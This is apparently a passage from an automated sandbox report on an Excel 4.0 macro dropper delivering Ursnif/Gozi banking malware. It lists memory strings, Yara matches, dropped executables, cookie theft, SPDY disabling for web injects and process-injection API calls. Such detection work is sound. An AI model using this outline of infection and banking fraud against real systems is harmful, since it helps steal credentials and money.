Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000014.00000000.914582302.000000000AC96000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000014.00000000.914582302.000000000AC96000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000014.00000000.914582302.000000000AC96000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000014.00000000.914582302.000000000AC96000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000014.00000000.914582302.000000000AC96000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000014.00000000.914582302.000000000AC96000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: explorer.exe, 00000014.00000002.982069439.00000000050CB000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/spartan/ientp?locale=en-US&market=US&enableregulatorypsm=0&enablecpsm=0&NTLogo=1

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000005.00000003.673957499.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.853724525.00000000018FC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.863551589.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.674022899.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.964247712.000002086E475000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.673619399.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.927921133.00000000003F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.673893180.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.961472793.000001D62C085000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.983042275.0000000005395000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.928724450.0000020620EA5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.673792212.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.874633274.000001E6C3640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.961758801.000001456D585000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.673489537.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.927231597.0000020620F10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.673993514.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.673725897.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3760, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3208, type: MEMORY

Source: CVPFktt.exe, 00000005.00000002.926338452.0000000000AA0000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Detected Gozi e-Banking trojan

Show sources

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ff		5_2_001CB18E
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ie		5_2_001CB18E

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000005.00000003.673957499.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.853724525.00000000018FC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.863551589.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.674022899.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.964247712.000002086E475000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.673619399.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.927921133.00000000003F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.673893180.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.961472793.000001D62C085000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.983042275.0000000005395000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.928724450.0000020620EA5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.673792212.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.874633274.000001E6C3640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.961758801.000001456D585000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.673489537.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.927231597.0000020620F10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.673993514.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.673725897.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3760, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3208, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Show sources

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Found malicious Excel 4.0 Macro

Show sources

Source: bonifico__8156.xls

Initial sample: URLDownloadToFileA

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000005.00000003.673957499.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY	Matched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.926087317.00000000009E1000.00000020.00000001.sdmp, type: MEMORY	Matched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000003.863551589.00000000001F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000003.863551589.00000000001F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000005.00000003.674022899.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY	Matched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.964247712.000002086E475000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000003.673619399.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY	Matched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.927921133.00000000003F5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000003.673893180.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY	Matched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.928248416.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY	Matched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.961472793.000001D62C085000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.983042275.0000000005395000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000003.840741747.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY	Matched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.928724450.0000020620EA5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000003.673792212.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY	Matched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000003.874633274.000001E6C3640000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000001A.00000002.961758801.000001456D585000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000003.673489537.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY	Matched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000003.927231597.0000020620F10000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000003.673993514.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY	Matched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000003.853379113.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY	Matched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000003.673725897.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY	Matched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000003.922958864.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY	Matched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: explorer.exe PID: 3760, type: MEMORY	Matched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: RuntimeBroker.exe PID: 3208, type: MEMORY	Matched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: bonifico__8156.xls	Initial sample: CALL
Source: bonifico__8156.xls	Initial sample: CALL

Found abnormal large hidden Excel 4.0 Macro sheet

Show sources

Source: bonifico__8156.xls

Initial sample: Sheet size: 501574

Office process drops PE file

Show sources

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\sxibiNa\ZpsvnMb\CVPFktt.exe			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\0n1ine[1].exe			Jump to dropped file

Writes or reads registry keys via WMI

Show sources

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_0040150E GetProcAddress,NtCreateSection,memset,	5_2_0040150E
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_004017B2 KiUserExceptionDispatcher,GetLastError,NtClose,	5_2_004017B2
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_004020BF NtMapViewOfSection,	5_2_004020BF
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001C11F3 NtCreateSection,memset,	5_2_001C11F3
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001D732E NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	5_2_001D732E
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001D154B NtMapViewOfSection,	5_2_001D154B
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001CB5B8 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	5_2_001CB5B8
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001C15C3 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,LdrInitializeThunk,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	5_2_001C15C3
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001CFE1C NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	5_2_001CFE1C
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001D3E77 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset,	5_2_001D3E77
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001D975C LdrInitializeThunk,NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	5_2_001D975C
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001DB746 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,FindCloseChangeNotification,	5_2_001DB746
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001DAFAE GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlExitUserThread,	5_2_001DAFAE
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001D180E memset,NtQueryInformationProcess,	5_2_001D180E
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001C9044 NtQueryKey,LdrInitializeThunk,NtQueryKey,lstrlenW,LdrInitializeThunk,NtQueryKey,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,	5_2_001C9044
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001CD086 NtGetContextThread,RtlNtStatusToDosError,	5_2_001CD086
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001C2A12 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	5_2_001C2A12
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001C6AFC NtQuerySystemInformation,RtlNtStatusToDosError,	5_2_001C6AFC
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001DD470 HeapFree,NtQueryInformationProcess,	5_2_001DD470
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001C84A9 memset,NtWow64QueryInformationProcess64,GetProcAddress,	5_2_001C84A9
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001DA6DC memset,memcpy,LdrInitializeThunk,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	5_2_001DA6DC
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001DAF91 RtlExitUserThread,GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlExitUserThread,	5_2_001DAF91
Source: C:\Windows\System32\control.exe	Code function: 19_2_003E08B8 NtWriteVirtualMemory,	19_2_003E08B8
Source: C:\Windows\System32\control.exe	Code function: 19_2_003D08F4 NtMapViewOfSection,	19_2_003D08F4
Source: C:\Windows\System32\control.exe	Code function: 19_2_003C2558 NtAllocateVirtualMemory,	19_2_003C2558
Source: C:\Windows\System32\control.exe	Code function: 19_2_003E8D90 NtQueryInformationProcess,	19_2_003E8D90
Source: C:\Windows\System32\control.exe	Code function: 19_2_003C59EC NtReadVirtualMemory,	19_2_003C59EC
Source: C:\Windows\System32\control.exe	Code function: 19_2_003CAEE0 NtCreateSection,	19_2_003CAEE0
Source: C:\Windows\System32\control.exe	Code function: 19_2_003DF2C8 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,	19_2_003DF2C8
Source: C:\Windows\System32\control.exe	Code function: 19_2_003E6338 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,	19_2_003E6338
Source: C:\Windows\System32\control.exe	Code function: 19_2_003D2348 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,FindCloseChangeNotification,	19_2_003D2348
Source: C:\Windows\System32\control.exe	Code function: 19_2_003E57EC NtQueryInformationProcess,	19_2_003E57EC
Source: C:\Windows\System32\control.exe	Code function: 19_2_003F8000 LdrLoadDll,NtProtectVirtualMemory,NtProtectVirtualMemory,	19_2_003F8000
Source: C:\Windows\explorer.exe	Code function: 20_2_05362558 NtAllocateVirtualMemory,	20_2_05362558
Source: C:\Windows\explorer.exe	Code function: 20_2_053659EC NtReadVirtualMemory,	20_2_053659EC
Source: C:\Windows\explorer.exe	Code function: 20_2_053808B8 NtWriteVirtualMemory,	20_2_053808B8
Source: C:\Windows\explorer.exe	Code function: 20_2_053708F4 NtMapViewOfSection,	20_2_053708F4
Source: C:\Windows\explorer.exe	Code function: 20_2_05386338 NtSetContextThread,NtUnmapViewOfSection,NtClose,	20_2_05386338
Source: C:\Windows\explorer.exe	Code function: 20_2_05372348 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,FindCloseChangeNotification,	20_2_05372348
Source: C:\Windows\explorer.exe	Code function: 20_2_053857EC NtQueryInformationProcess,	20_2_053857EC
Source: C:\Windows\explorer.exe	Code function: 20_2_05380E70 NtQuerySystemInformation,	20_2_05380E70
Source: C:\Windows\explorer.exe	Code function: 20_2_0536AEE0 NtCreateSection,	20_2_0536AEE0
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E8F2C8 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,	25_2_0000020620E8F2C8
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E957EC NtQueryInformationProcess,	25_2_0000020620E957EC
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620EA8049 LdrLoadDll,NtProtectVirtualMemory,NtProtectVirtualMemory,	25_2_0000020620EA8049

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe

Code function: 5_2_001DE843 CreateProcessAsUserW,

5_2_001DE843

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001E14A8	5_2_001E14A8
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001CE5F5	5_2_001CE5F5
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001CFE72	5_2_001CFE72
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_0041A062	5_2_0041A062
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_0041B9CA	5_2_0041B9CA
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_0041A5B3	5_2_0041A5B3
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_00419B11	5_2_00419B11
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_00417B3E	5_2_00417B3E
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_0041BFF0	5_2_0041BFF0
Source: C:\Windows\System32\control.exe	Code function: 19_2_003CBA44	19_2_003CBA44
Source: C:\Windows\System32\control.exe	Code function: 19_2_003E6338	19_2_003E6338
Source: C:\Windows\System32\control.exe	Code function: 19_2_003C7700	19_2_003C7700
Source: C:\Windows\System32\control.exe	Code function: 19_2_003DA43C	19_2_003DA43C
Source: C:\Windows\System32\control.exe	Code function: 19_2_003DD03C	19_2_003DD03C
Source: C:\Windows\System32\control.exe	Code function: 19_2_003E4014	19_2_003E4014
Source: C:\Windows\System32\control.exe	Code function: 19_2_003CF40C	19_2_003CF40C
Source: C:\Windows\System32\control.exe	Code function: 19_2_003D4800	19_2_003D4800
Source: C:\Windows\System32\control.exe	Code function: 19_2_003D3C7C	19_2_003D3C7C
Source: C:\Windows\System32\control.exe	Code function: 19_2_003DC078	19_2_003DC078
Source: C:\Windows\System32\control.exe	Code function: 19_2_003E8854	19_2_003E8854
